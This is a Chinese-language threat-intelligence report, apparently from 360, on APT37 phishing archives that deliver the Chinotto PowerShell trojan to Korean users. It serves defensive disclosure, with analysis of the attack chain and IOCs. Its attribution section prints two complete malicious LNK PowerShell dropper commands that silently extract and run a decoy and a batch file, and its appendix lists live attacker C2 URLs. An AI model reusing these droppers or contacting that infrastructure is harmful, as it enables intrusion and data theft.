APT37组织构造诱饵文件向韩文用户投递Chinotto恶意软件

APT-C-28（ScarCruft）

APT-C-28（ScarCruft）亦被称为APT37（Reaper）、Group123等，是一个来自朝鲜半岛的APT组织。该组织自被披露以来，其攻击活动一直持续至今，并维持着较高的活跃度。APT-C-28的主要目标是韩国等亚洲国家，且在多个领域开展网络间谍活动，其中涵盖化学、电子、制造、航空航天、汽车和医疗保健等行业。

近期，360高级威胁研究院发现该组织托管在某网站后台的恶意攻击文件，涉及携带载荷的ZIP和RAR类型的压缩包文件，这些载荷通过释放或远端加载恶意脚本，进而无文件加载Powershell类型的Chinotto木马进行窃密行动，并且加载的木马远控指令有所增加，说明该组织在不断优化更新其载荷，以达到窃密目的。

一、攻击活动分析

1.攻击流程分析

APT-C-28组织通过钓鱼邮件捆绑恶意的ZIP和RAR压缩包。其中ZIP文件携带恶意LNK文件,执行时释放诱饵和BAT文件，批处理文件内存加载Powershell程序，进而加载恶意远控。RAR文件携带恶意CHM文件，打开时会远程加载1.html文件，进而内存加载Chinotto远控，从而完成窃密活动。

2.载荷投递分析

本轮攻击行动中，我们发现攻击者将恶意样本托管在某网站后台，猜测攻击者是通过下发钓鱼邮件的方式诱导受害者下载恶意文件并打开。恶意文件还有REPORT.zip、KB_20230531.rar、attachment.rar、hanacard_20230610.rar，结合该组织以往的攻击特点，文件名中携带的数字意为日期，可见本次攻击活动至少发生在2023年5月31号前。    

恶意文件携带的部分诱饵文档如下所示。

诱饵1：企业当前情况调查表：

诱饵2：排放福岛污水造成的民生问题

诱饵3：个人信息（出身日期）收集钓鱼  

3.恶意载荷分析

本次捕获的样本从压缩包类型分为ZIP压缩和RAR压缩，并且两者在攻击链上也不尽相同，下面将逐一分析。

3.1 ZIP类型

其中一个ZIP样本信息如下所示：

对ZIP解压得到恶意LNK文件，解析LNK的执行参数得到如下Powershell脚本。    

其执行时从自身提取并在%temp%目录下释放xlsx类型诱饵文档和恶意批处理文件PMmVvG56FLC9y.bat。

BAT文件先将自身复制到"%appdata%MicrosoftProtectUserProfileSafeBackup.bat"，然后设置注册表自启动，接着启动powershell.exe加载混淆的代码，去混淆得到ps1脚本如下所示：    

其功能为设置注册表以开机加载远端1.html脚本从而执行后续功能，接着用携带计算机名和用户名的URL向服务器发起POST连接，根据响应判断是否包含“regedit”指令，若存在，则设置注册表项，根据前面功能来看这一指令也是设置开机自启远程加载脚本执行功能。

mshta加载的远端1.html文件如下：

对远端文件的载荷base64解密得到Powershell代码，功能依然为添加注册表自启实现与远端服务器交互，不同于前一阶段，远端脚本实现了信息获取、文件下载、文件上传、插件执行等多种功能，具体涉及的指令如下表所示。  

3.2 RAR类型

RAR类型的样本均携带有恶意CHM文件，以其中之一分析说明，样本信息如下所示。

恶意CHM文件后打开后通过mshta加载远程脚本，进而通过Powersehll下发恶意组件。  

加载的远端文件最后执行的Powershell脚本从形式上看整体风格与上面分析的类似，脚本与C2：75.119.136.207进行通信，只是相关指令有所不同，如下所示。

此外，我们从CHM中的恶意连接（http://bian0151.cafe24.com/member/1.html）先后得到了不一样的载荷，经过分析发现，其功能及指令完全相同，但存在两处变化，一是设置注册表自启加载的远端连接发生了改变，二是后一次的代码变量名混淆长度增加，修改变量名可能是为了逃避杀软的静态检测，从这两处变化来看，攻击者都在积极适配不同场景下的攻击需求,并且最近一直在持续更新。    

二、归属研判

1) APT-C-28组织惯于使用大LNK作为攻击载荷，本次也不例外，对LNK解析得到的执行代码与之前样本相似，并且从LNK中释放的BAT代码结构也相似，下列表格中第一行是以往样本，第二行为本次样本,可以看出整体结构几乎完全一致。

/c powershell -windowstyle hidden  $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match  'Program Files') {$dirPath = '%temp%'}; $lnkpath = Get-ChildItem -Path  $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0000AB7F4E} ^|  Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte  -TotalCount 00085268 -ReadCount 00085268; $pdfPath = '%temp%2023년도 4월  29일세미나.pdf'; sc $pdfPath  ([byte[]]($pdfFile ^| select -Skip 002390)) -Encoding Byte; ^& $pdfPath;  $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00088506 -ReadCount  00088506; $exePath = '%temp%230415.bat'; sc $exePath ([byte[]]($exeFile ^|  select -Skip 00085268)) -Encoding Byte; ^& $exePath;

/c  powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match  'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj  = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq  0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType()  -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj  -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%현황조사표.xlsx';sc $tyxkEP  ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^&  $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount  79888;$WH9lSPHOFI = '%temp%PMmVvG56FLC9y.bat';sc $WH9lSPHOFI  ([byte[]]($Cbe1yj ^| select -Skip 74342)) -Encoding Byte;^&  %windir%SysWOW64cmd.exe /c $WH9lSPHOFI;

2) 第一点提到的LNK文件跟CHM文件都是挂在同一个正常站点来进行分发，并且CHM文件加载的远端连接和以前样本相同，均为html文件，html文件最终加载的载荷都为该组织的攻击武器Chinotto木马。

3) 恶意样本诱饵文档信息显示为韩文，这与该组织的攻击目标一致。

综上，我们将其归属到APT-C-28组织。

总结

APT-C-28（ScarCruft）组织自被披露以来长期保持针对目标国家及地区的网络攻击行动，并且有愈演愈烈的趋势。在本轮攻击中，攻击者通过制造诱饵钓鱼页面的方式收集受害者个人信息，并且每次执行都会设置自启以维持控制，自启加载的远端连接灵活多变；此外，在短时间内我们还观察到了同一载荷的不同编码样本，可见该组织一直在积极备战，并展现出对目标的专注，内存加载的Chinotto木马功能丰富，从指令来看，相信还有更多的功能未被披露，后续我们也将持续跟进。

在这里提醒用户加强安全意识，切勿执行未知文件或点击来历不明的链接等操作。这些行为可能导致系统在没有任何防范的情况下被攻陷，从而导致机密文件和重要情报的泄漏。

附录IOC

MD5：

16a34b0e194b3f825a19db5363df4cca
0eb8db3cbde470407f942fd63afe42b8
3e4db47cff72462cd62e97cd8ca64c57
fa03b0248a109a86eaddba108ebfcb14
a28bb1ece40acad5522365f8959a073c    
c52f99555875c34bd1bd531ffab65234
a6136fa5e2c7d51187221e83e52b9402
2b86cc9776d43c7916f5044a092c866d
136ceaa4b76934d78546271c08f51aa2
2d444b6f72c8327d1d155faa2cca7fd7
27f74072d6268b5d96d73107c560d852
a6b567ed3fa03086d1926121d5df1bf6
40448bd32580cf4e948f2d725cbdaf40
a8c06b1f34c430358a2db30988066def
9e6a2914a35256dd450db549fb975f45
fc14a3c671818013c71961b0254c7308
8ed5ace15be01c53c57f7f80a4fcb6cd

C&C：

http://75.119.136[.]207/config/bases/config.php
http://bian0151.cafe24[.]com/admin/board/1.html
http://bian0151.cafe24[.]com/member/1.html
http://75.119.136[.]207/config/bases/1.html
http://ableinfo.co[.]kr/member/1.html
http://navercorp[.]ru/dashboard/image/202302/4.html
http://navercorp[.]ru/dashboard/image/202302/com.php

转载来源：https://mp.weixin.qq.com/s/s3WVSPNjkfvhROufXrDtiQ

图片来源网络目标可联系删除